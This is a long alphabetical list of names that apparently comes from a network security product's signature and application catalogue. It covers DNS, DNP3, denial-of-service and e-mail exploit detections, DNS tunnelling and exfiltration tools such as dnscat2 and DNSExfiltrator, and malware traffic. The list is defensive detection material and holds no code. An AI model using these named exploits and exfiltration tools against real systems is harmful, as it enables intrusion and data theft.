DNP3-UDP_Request-Reserved-Function-Code
DNP3-UDP_Response-Reserved-Function-Code
DNP3-UDP_Save-Configuration-Request
DNP3-UDP_Select-Request
DNP3-UDP_Solicited-Response
DNP3-UDP_Start-Application-Request
DNP3-UDP_Stop-Application-Request
DNP3-UDP_Unsolicited-Response
DNP3-UDP_Warm-Restart-Request
DNP3-UDP_Write-Request
DNS
DNS Sinkhole Stop Condition
DNS-Made-Easy
DNS-Over-HTTPS
DNS-Over-TLS
DNS-Park
DNS-TCP_Alpha-Serverside-ShellCode-Detect
DNS-TCP_DirectConnect-Client-To-Client-Handshake
DNS-TCP_Empty-TTL-In-Reply
DNS-TCP_Exim-DKIM-DNS-Decoding-Buffer-Overflow
DNS-TCP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow
DNS-TCP_Iquery-ADM-W0rm-Detection
DNS-TCP_Iquery-BOF-12
DNS-TCP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
DNS-TCP_Isc-Bind-Openpgpkey61c-Denial-Of-Service
DNS-TCP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
DNS-TCP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
DNS-TCP_ISC-BIND-RRSIG-RRsets-Denial-Of-Service
DNS-TCP_ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-3
DNS-TCP_ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write
DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service-2
DNS-TCP_Localhost-Address-Resolved
DNS-TCP_Message-Parser
DNS-TCP_Microsoft-SMTP-Server-DNS-Handling-Vulnerability
DNS-TCP_Microsoft-Windows-DNS-Client-Buffer-Overrun
DNS-TCP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
DNS-TCP_MIPS-IRIX-NXT-BOF
DNS-TCP_MIPS-Serverside-ShellCode-Detect
DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service
DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Possible-Denial-Of-Service
DNS-TCP_Nameserver-Version-Query
DNS-TCP_Pa-RISC-ShellCode-Detect
DNS-TCP_Php-DNS_Get_Record-Out-Of-Bounds-Read
DNS-TCP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service
DNS-TCP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
DNS-TCP_PPC-Serverside-ShellCode-Detect
DNS-TCP_Reply-Type-Null
DNS-TCP_Sparc-BOF
DNS-TCP_Sparc-Serverside-ShellCode-Detect
DNS-TCP_Sparc-Solaris-NXT-BOF-1
DNS-TCP_Squid-DNS-Lookup-Denial-Of-Service
DNS-TCP_Standard-Query-Request-Type-A
DNS-TCP_Standard-Query-Request-Type-AAAA
DNS-TCP_Standard-Query-Request-Type-CNAME
DNS-TCP_Standard-Query-Request-Type-KEY
DNS-TCP_Standard-Query-Request-Type-MX
DNS-TCP_Standard-Query-Request-Type-Null
DNS-TCP_Standard-Query-Request-Type-SRV
DNS-TCP_Standard-Query-Request-Type-TXT
DNS-TCP_Standard-Query-Request-Type-WKS
DNS-TCP_Suspicious-Content
DNS-TCP_Suspicious-Response
DNS-TCP_Symantec-Gateway-Products-DNS-Cache-Poisoning
DNS-TCP_Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow
DNS-TCP_Txt-Query-Reply-255-Length
DNS-TCP_Uid-Response-Detect
DNS-TCP_Uncommon-Address-Resolved
DNS-TCP_Windows-Dnsapi-Remote-Code-Execution-Vulnerability
DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Request-CVE-2020-1350
DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Response-CVE-2020-1350
DNS-TCP_X86-BOF-10
DNS-TCP_X86-BSD-NXT-BOF-1
DNS-TCP_X86-BSD-NXT-BOF-2
DNS-TCP_X86-Iquery-BOF-1
DNS-TCP_X86-Iquery-BOF-11
DNS-TCP_X86-Iquery-BOF-2
DNS-TCP_X86-Iquery-BOF-3
DNS-TCP_X86-Iquery-BOF-6
DNS-TCP_X86-Iquery-BOF-7
DNS-TCP_X86-Iquery-BOF-8
DNS-TCP_X86-Iquery-BOF-9
DNS-TCP_X86-Linux-NXT-BOF-1
DNS-TCP_X86-Linux-NXT-BOF-2
DNS-TCP_X86-Linux-NXT-BOF-3
DNS-TCP_X86-Serverside-ShellCode-Detect
DNS-UDP_BIND-Opt-Subdomain-Denial-Of-Service
DNS-UDP_BIND-TKEY-Queries-Input-Validation-DoS-3
DNS-UDP_BIND-Tsig-X86-BOF
DNS-UDP_BIND-Tsig-X86-Linux-BOF
DNS-UDP_BIND-Tsig-X86-Linux-BOF-2
DNS-UDP_Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query
DNS-UDP_DNS-Error-Response-With-Same-Source-And-Destination-Ports
DNS-UDP_DNS-Query-Containing-Base64-Encoded-Data
DNS-UDP_dnscat2-DNS-Tunnel-Usage
DNS-UDP_DNSExfiltrator-Traffic
DNS-UDP_Dnsmasq-extract_Name-Out-Of-Bounds-Write
DNS-UDP_Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write
DNS-UDP_Dot-Query
DNS-UDP_Dynamic-DNS-WPAD-Host-Name-Registration
DNS-UDP_Ebury-SSH-Backdoor
DNS-UDP_Empty-TTL-In-Reply
DNS-UDP_Exim-DKIM-DNS-Decoding-Buffer-Overflow
DNS-UDP_Glibc-DNS-Resolver-Buffer-Overflow
DNS-UDP_Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow
DNS-UDP_GnuTLS-DANE-dane.c-Heap-Buffer-Overflow
DNS-UDP_Inverse-Infoleak
DNS-UDP_Inverse-Infoleak-2
DNS-UDP_Isc-Authoritative-Resource-Record
DNS-UDP_ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service
DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service
DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-DoS
DNS-UDP_ISC-BIND-Denial-Of-Service-CVE-2017-3140
DNS-UDP_ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-Dname-Response-Processing-Denial-Of-Service
DNS-UDP_ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service
DNS-UDP_ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service
DNS-UDP_ISC-BIND-DNSSEC-Validation-Denial-Of-Service
DNS-UDP_ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service
DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service-Exploit
DNS-UDP_ISC-Bind-Edns-Option-Processing-Denial-Of-Service
DNS-UDP_ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
DNS-UDP_Isc-Bind-Openpgpkey61c-Denial-Of-Service
DNS-UDP_ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service
DNS-UDP_ISC-BIND-Query_addsoa-Denial-Of-Service
DNS-UDP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
DNS-UDP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
DNS-UDP_ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS
DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2
DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-1
DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-2
DNS-UDP_ISC-Bind-Tsig-Validation-Denial-Of-Service
DNS-UDP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
DNS-UDP_Libspf2-Macro-Expansion-Integer-Underflow
DNS-UDP_Localhost-Address-Resolved
DNS-UDP_Long-Domain-Name-With-Mixed-Letters-And-Digits
DNS-UDP_Message-Parser
DNS-UDP_Microsoft-DNS-Server-Any-Query-Cache-Weakness
DNS-UDP_Microsoft-DNS-Server-Denial-of-Service
DNS-UDP_Microsoft-DNS-Server-Denial-of-Service-2
DNS-UDP_Microsoft-Windows-DNS-Client-Buffer-Overrun-2
DNS-UDP_Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
DNS-UDP_Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability
DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability-2
DNS-UDP_Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow
DNS-UDP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing
DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing-2
DNS-UDP_Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service
DNS-UDP_Microsoft-Windows2k8-NAPTR-RCE
DNS-UDP_Mozart-Loader-Traffic
DNS-UDP_MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
DNS-UDP_Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service
DNS-UDP_Multiple-Vendors-DNS-Txt-Record-Parsing-Buffer-Overflow
DNS-UDP_Nameserver-Version-Query
DNS-UDP_Nginx-DNS-Resolver-Denial-Of-Service
DNS-UDP_Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow
DNS-UDP_NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service
DNS-UDP_NSEC3-Invalid-Field-Length
DNS-UDP_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow
DNS-UDP_Out-Of-State-DNS-Response-With-Additional-Record
DNS-UDP_OzymanDNS-Tunnel-Request
DNS-UDP_OzymanDNS-Tunnel-Response
DNS-UDP_Php-DNS_Get_Record-Out-Of-Bounds-Read
DNS-UDP_PowerDNS-Authoritative-Server-CVE-2021-36754-DoS
DNS-UDP_PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service
DNS-UDP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service
DNS-UDP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
DNS-UDP_PowerDNS-Recursor-Denial-Of-Service
DNS-UDP_Private-Address-Resolved
DNS-UDP_Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow
DNS-UDP_Reply-Type-Null
DNS-UDP_Samba-DNS-Reply-Flag-Denial-Of-Service
DNS-UDP_Spotify-Server-Query
DNS-UDP_Squid-DNS-Lookup-Denial-Of-Service
DNS-UDP_Squid-DNS-Replies-Invalid-Free
DNS-UDP_Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
DNS-UDP_SS-Cross-Site-Script-Encoder
DNS-UDP_Standard-Query-Reply-Type-A
DNS-UDP_Standard-Query-Reply-Type-CNAME
DNS-UDP_Standard-Query-Reply-Type-KEY
DNS-UDP_Standard-Query-Reply-Type-MX
DNS-UDP_Standard-Query-Reply-Type-Null
DNS-UDP_Standard-Query-Reply-Type-SRV
DNS-UDP_Standard-Query-Reply-Type-TXT
DNS-UDP_Standard-Query-Request-Type-A
DNS-UDP_Standard-Query-Request-Type-AAAA
DNS-UDP_Standard-Query-Request-Type-Any
DNS-UDP_Standard-Query-Request-Type-CNAME
DNS-UDP_Standard-Query-Request-Type-KEY
DNS-UDP_Standard-Query-Request-Type-MX
DNS-UDP_Standard-Query-Request-Type-Null
DNS-UDP_Standard-Query-Request-Type-SRV
DNS-UDP_Standard-Query-Request-Type-TXT
DNS-UDP_Standard-Query-Request-Type-WKS
DNS-UDP_Sun-Java-JRE-DNS-Denial-Of-Service
DNS-UDP_Suspicious-Address-Resolve
DNS-UDP_Suspicious-Content
DNS-UDP_Suspicious-Long-Domain-Name-With-Mixed-Letters-And-Digits
DNS-UDP_Suspicious-Query
DNS-UDP_Suspicious-Response
DNS-UDP_Suspicious-RRSIG
DNS-UDP_Suspiciously-Long-TXT-Reply-Content
DNS-UDP_Symantec-DNS-Compression-DoS
DNS-UDP_Symantec-Gateway-Products-DNS-Cache-Poisoning
DNS-UDP_Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof
DNS-UDP_Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop
DNS-UDP_TippingPoint-Ips-Reverse-DNS-Lookup-Format-String
DNS-UDP_TrickBot-AnchorDNS-Client-Tunnel-Message
DNS-UDP_TrickBot-AnchorDNS-Server-Tunnel-Message
DNS-UDP_Txt-Query-Reply-255-Length
DNS-UDP_Uncommon-Address-Resolved
DNS-UDP_Worm-Autorun-Aaeb-H-Request
DNS-UDP_Worm-Autorun-Aaeb-H-Response-Detected
DNS-UDP_Your-Freedom-Network-Query
DNS-UDP_Zlip-Compression-Pointer-DoS-1
DNS-UDP_Zlip-Compression-Pointer-DoS-2
DNS-UDP_Zlip-Compression-Pointer-DoS-3
DNS-UDP_Zloader-Malware-DNS-Tunneling
DNSCurve
DNSimple
Dnsstuff
DNS_Class-Not-IN
DNS_Class-Not-IN-Reply-Failure
DNS_Class-Not-IN-Reply-Success
DNS_Client-Class-Query-Only
DNS_Client-Class-Unknown
DNS_Client-Header-Z-Nonzero
DNS_Client-Hostname-Length
DNS_Client-Hostname-Syntax-Incorrect
DNS_Client-Name-Bad-Label-Type
DNS_Client-Name-Bad-Pointer-Version-2
DNS_Client-Name-Length
DNS_Client-Name-Syntax-Incorrect
DNS_Client-Name-Too-Long
DNS_Client-Opcode-Unknown
DNS_Client-Premature-End
DNS_Client-QDCOUNT-Not-1
DNS_Client-Question-Logged
DNS_Client-RCODE-Unknown
DNS_Client-Resource-Record-Extra-Data
DNS_Client-Resource-Record-Over-Length
DNS_Client-TCP-Extra-Data
DNS_Client-TCP-Over-Length
DNS_Client-TCP-QR-Wrong-Direction
DNS_Client-Type-Nonquery
DNS_Client-Type-Query-Only
DNS_Client-Type-Unknown
DNS_Client-UDP-Extra-Data
DNS_Client-UDP-Payload-By-OPT
DNS_Client-UDP-Payload-Length
DNS_Client-UDP-QR-Wrong-Direction
DNS_DDNS_update
DNS_Dynamic_DNS_Violation
DNS_IQUERY-Reply-Failure
DNS_IQUERY-Reply-Success
DNS_IQUERY-Request
DNS_ISC-BIND-Empty-RSA-Modulus
DNS_Message-Parser
DNS_NOTIFY-Reply-Failure
DNS_NOTIFY-Reply-Success
DNS_NOTIFY-Request
DNS_Protocol_Violation
DNS_Question-Processed
DNS_Record-Address-Logged
DNS_Recursion-Recursion-Available
DNS_Recursion-Recursion-Desired
DNS_Recursion-Reply-Success
DNS_Reply_Modified
DNS_Server-Class-Query-Only
DNS_Server-Class-Unknown
DNS_Server-Header-Z-Nonzero
DNS_Server-Hostname-Length
DNS_Server-Hostname-Syntax-Incorrect
DNS_Server-Name-Bad-Label-Type
DNS_Server-Name-Bad-Pointer-Version-2
DNS_Server-Name-Length
DNS_Server-Name-Syntax-Incorrect
DNS_Server-Name-Too-Long
DNS_Server-Opcode-Unknown
DNS_Server-Premature-End
DNS_Server-QDCOUNT-Not-1
DNS_Server-Question-Logged
DNS_Server-RCODE-Unknown
DNS_Server-Resource-Record-Extra-Data
DNS_Server-Resource-Record-Over-Length
DNS_Server-TCP-Extra-Data
DNS_Server-TCP-Over-Length
DNS_Server-TCP-QR-Wrong-Direction
DNS_Server-Type-Nonquery
DNS_Server-Type-Query-Only
DNS_Server-Type-Unknown
DNS_Server-UDP-Extra-Data
DNS_Server-UDP-Payload-By-OPT
DNS_Server-UDP-Payload-Length
DNS_Server-UDP-QR-Wrong-Direction
DNS_Standard-Query-Reply-Failure
DNS_Standard-Query-Reply-Success
DNS_Standard-Query-Request
DNS_Transaction-State-Limit-Exceeded
DNS_Transfer-Reply-Failure
DNS_Transfer-Reply-Success
DNS_Transfer-Request
DNS_Update-Reply-Failure
DNS_Update-Reply-Success
DNS_Update-Request
DNS_Zone_Transfer_Violation
DNV-GL
Do.com
Doba
DocandDo
Doccle
Docebo
Docker
DOCKMAN-container-failed
DOCKMAN-container-healthcheck failed
DOCKMAN-container-started
DOCKMAN-container-stopped
DOCKMAN-registry-logged-in
DOCKMAN-registry-login-failed
DOCKMAN-registry-pulled
DOCKMAN-ztna-failed
DOCKMAN-ztna-server-queried
DOCKMAN-ztna-started
DOCKMAN-ztna-stopped
DOCKMAN-ztna-updated
Docracy
docSTAR
DocStoc
Document-Viewing-and-Conversion-Applications-and-SDKs
Documentree
Docupace
Docurated
Docusign
DocuVantage
DocuWare
DocuXplorer
Docverify
Doit.im
Dokmee
DokuWiki
DollyDrive
Domain
Domain-Factory
DomainsNext
DomainTools
Dome9
Domeny
Dominion-Dealer
DoneSafe
DonorDrive
DonorPerfect-Fundraising-Software
Doodle
Doof
Doolphy
Doshow
DOS_1234
DOS_BONK
DOS_HTTP-Slow-Headers
DOS_HTTP-Slow-POST
DOS_JOLT
DOS_LAND
DOS_LINUX_ICMP
DOS_NESTEA
DOS_NEWTEAR
DOS_OSHARE
DOS_RST-Flood-Finished
DOS_RST-Flood-Started
DOS_SAIHYOUSEN
DOS_SYN-Flood-Finished
DOS_SYN-Flood-In-Progress
DOS_SYN-Flood-Started
DOS_SYN-Flood-Untrackable
DOS_SYNDROP
DOS_TCP-Finished
DOS_TCP_SynAck_Started
DOS_TEARDROP
DOS_UDP-Finished
DOS_UDP_Started
DOS_WINNUKE
DotCloud
Dotcom-Monitor
Dotloop
DotNetNuke
Dotphoto
Dotster
Dotsub
Douban
Doubletwist
Dovico
Doximity
Doyenz-rCloud
Dozeo
Dpsolutions
Draugiem.lv
DrawLoop
Dream-Broker
Dreambox
DreamHost
DreamTeam-Project-Management
Dremus
DrexelOne
Dribbble
DriveHQ
DrivePop
Drivy
DroidVPN
Drop.io
Dropbox
Dropbox
Dropbox Update
Dropbox-File-Upload
Dropcam
DropCanvas
Droplr
Dropmysite
Dropsend
Dropshots
Drugs
Drumbi
Drupal
Drupalize.Me
Druva
dscsag
DSI
DSpace
DSRegCmd
dstglobalsolutions
DTLS
dts
DuckDuckGo
DuckDuckGo Safe Resolve
DuckDuckGo Safe Rewrite
Ducksboard
DueDil
Dungeons-And-Dragons-Online
Duolingo
DurableDNS
DwDrive
Dwolla
DXC.technology
DXL_Broker_connection_error
DXL_Broker_connection_ok
DXL_File_reputation_declined
DXL_File_reputation_defined
DXL_File_reputation_erased
DXL_File_reputation_improved
Dyn
DynAdmic
Dynadot
Dynamic Content
Dynamic DNS
Dynamic_Routing_Neighbor_Down
Dynamic_Routing_Neighbor_UP
Dynamic_Routing_Not_Started
Dynamic_Routing_Route_Added
Dynamic_Routing_Route_Deleted
Dynamsoft
Dynatrace
Dzone-Software
e-Builder
E-conomic
e-DECA
E-Mail_Agent-Tesla-SMTP-Traffic
E-Mail_Base64-Syntax-Incorrect
E-Mail_Boundary-String-Too-Long
E-Mail_BS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
E-Mail_BS-Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
E-Mail_BS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
E-Mail_BS-Adobe-authplay.dll-CVE-2010-1297-Exploit
E-Mail_BS-Adobe-Flash-Embedded-In-PDF-Download
E-Mail_BS-Adobe-Flash-Exploit-CVE-2011-0609
E-Mail_BS-Adobe-Reader-Integer-Overflow-CVE-2010-2862
E-Mail_BS-Ani-Windows-Animationheader-Length-Buffer-Overflow
E-Mail_BS-Apple-QuickTime-BMP-Handling-Buffer-Overflow
E-Mail_BS-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
E-Mail_BS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
E-Mail_BS-Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
E-Mail_BS-EICAR-AntiVirus-Test-File
E-Mail_BS-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
E-Mail_BS-Excel-Memory-Corruption-CVE-2010-0823
E-Mail_BS-Executable-File-Transfer
E-Mail_BS-FFmpeg-OGV-File-Format-Memory-Corruption
E-Mail_BS-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
E-Mail_BS-Gzip-Compressed-File-Transfer
E-Mail_BS-IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
E-Mail_BS-IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
E-Mail_BS-IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
E-Mail_BS-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow
E-Mail_BS-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
E-Mail_BS-Internet-Explorer-JPEG-Rendering-Memory-Corruption
E-Mail_BS-JavaScript-In-PDF
E-Mail_BS-JavaScript-With-Open-Action-In-PDF
E-Mail_BS-Malicious-BMP-File-CVE-2009-2518
E-Mail_BS-Microsoft-Embedded-Font-EOT-File-Reference
E-Mail_BS-Microsoft-Excel-Crafted-Url-Buffer-Overflow
E-Mail_BS-Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
E-Mail_BS-Microsoft-Excel-File-Importing-Code-Execution
E-Mail_BS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
E-Mail_BS-Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
E-Mail_BS-Microsoft-Exchange-Calendar-Code-Execution
E-Mail_BS-Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
E-Mail_BS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow
E-Mail_BS-Microsoft-Jet-Db-Engine-Buffer-Overflow
E-Mail_BS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
E-Mail_BS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
E-Mail_BS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
E-Mail_BS-Microsoft-Office-Excel-Object-Record-Corruption
E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
E-Mail_BS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
E-Mail_BS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
E-Mail_BS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
E-Mail_BS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
E-Mail_BS-Microsoft-OLE-Structured-Storage-File-Transfer
E-Mail_BS-Microsoft-OLE-Structured-Storage-Suspicious-File-Transfer
E-Mail_BS-Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption
E-Mail_BS-Microsoft-Outlook-SMB-Attachment
E-Mail_BS-Microsoft-Outlook-SMB-Msg-Attachment
E-Mail_BS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
E-Mail_BS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
E-Mail_BS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
E-Mail_BS-Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
E-Mail_BS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
E-Mail_BS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
E-Mail_BS-Microsoft-Windows-Shell-MSHTA-Script-Execution
E-Mail_BS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
E-Mail_BS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
E-Mail_BS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
E-Mail_BS-Microsoft-Word-Section-Table-Array-Buffer-Overflow
E-Mail_BS-Mozilla-Command-Line-Url-Command-Execution
E-Mail_BS-Mozilla-Thunderbird-Iframe-JavaScript-Execution
E-Mail_BS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
E-Mail_BS-PNG-Image-With-Large-Data-Length-Value
E-Mail_BS-Shared-Variables
E-Mail_BS-Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
E-Mail_BS-Suspicious-ICC-Profile-In-JPEG-File
E-Mail_BS-Windows-Media-Player-ASF-CVE-2009-2527
E-Mail_BS-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
E-Mail_BS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
E-Mail_BS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
E-Mail_BS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
E-Mail_BS-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
E-Mail_BS-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
E-Mail_BS-Zip-Archive-Transfer
E-Mail_Compressed-TNEF-RTF-Memory-Corruption
E-Mail_Content-Transfer-Encoding-Duplicate
E-Mail_Content-Transfer-Encoding-Unknown
E-Mail_Content-Type-Duplicate
E-Mail_Content-Type-Invalid
E-Mail_Encoding-Multipart-Invalid
E-Mail_Encoding-RFC822-Invalid
E-Mail_Exim-Filename-Header-Misparsing-CVE-2024-39929
E-Mail_HCS-Bash-Shellshock-Code-Injection
E-Mail_HCS-BitDefender-AntiVirus-Logging-Function-Format-String
E-Mail_HCS-Elm-Expires-Header-Field-Buffer-Overflow
E-Mail_HCS-Mail-From-Format-String
E-Mail_HCS-Mail-Hdr-Sendmail-Header-BOF
E-Mail_HCS-Mail-To-Format-String
E-Mail_HCS-MailEnable-SMTP-Mailto-Format-String
E-Mail_HCS-Malformed-Date-Header-Field
E-Mail_HCS-Malformed-Utf8-Encoded-Attachment-Filename
E-Mail_HCS-MDaemon-Content-Filter-Directory-Traversal
E-Mail_HCS-Microsoft-Collaboration-Data-Objects-BOF
E-Mail_HCS-Microsoft-Exchange-And-Outlook-TNEF-Encoding
E-Mail_HCS-Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow
E-Mail_HCS-Shared-Variables
E-Mail_HCS-Sophos-Anti-Virus-Reserved-Device-Name-Handling
E-Mail_HCS-SpamAssassin-Long-Message-Header-DoS
E-Mail_HCS-SpamAssassin-Malformed-Email-Header-DoS
E-Mail_HCS-SquirrelMail-Content-Type-Header-Cross-Site-Scripting
E-Mail_IMF-Base64-Length-Inconsistency
E-Mail_IMF-Boundary-String-Invalid
E-Mail_IMF-MIME-Parameter-Syntax-Incorrect
E-Mail_IMF-Multipart-Delimiter-Use-Invalid
E-Mail_IMF-Quoted-Printable-Hexadecimal-Charater-Lowercase
E-Mail_IMF-Quoted-Printable-Whitespace-After-EqualL
E-Mail_IMF-Too-Long-Header
E-Mail_IMF-Too-Long-Header-Field
E-Mail_IMF-Too-Long-MIME-Parameter-Name
E-Mail_IMF-Too-Long-MIME-Subtype-Name
E-Mail_Ipswitch-IMail-Server-Content-Type-BOF
E-Mail_Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF
E-Mail_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
E-Mail_Message-Id-Random
E-Mail_Message-Syntax-Error
E-Mail_Message_Partial
E-Mail_Microsoft-Outlook-Object-Security-Bypass-Vulnerability
E-Mail_MIME-Version-Invalid
E-Mail_Multidropper-Traffic
E-Mail_Multipart-No-Valid-Boundary-String
E-Mail_Quoted-Printable-Syntax-Incorrect
E-Mail_Suspicious-Header
E-Mail_Too-Many-Header-Fields
E-Mail_Too-Many-MIME-Parameter-Parts
E-Mail_Zimbra-Collaboration-Suite-Cross-Site-Scripting-CVE-2018-6882
e-MDs
E-nable
E-Online
e-SignLive
E-storage
E-Trade
e-Zest
e2Campus
e2open
E3-EMIS
EA-Games
EA-Origin
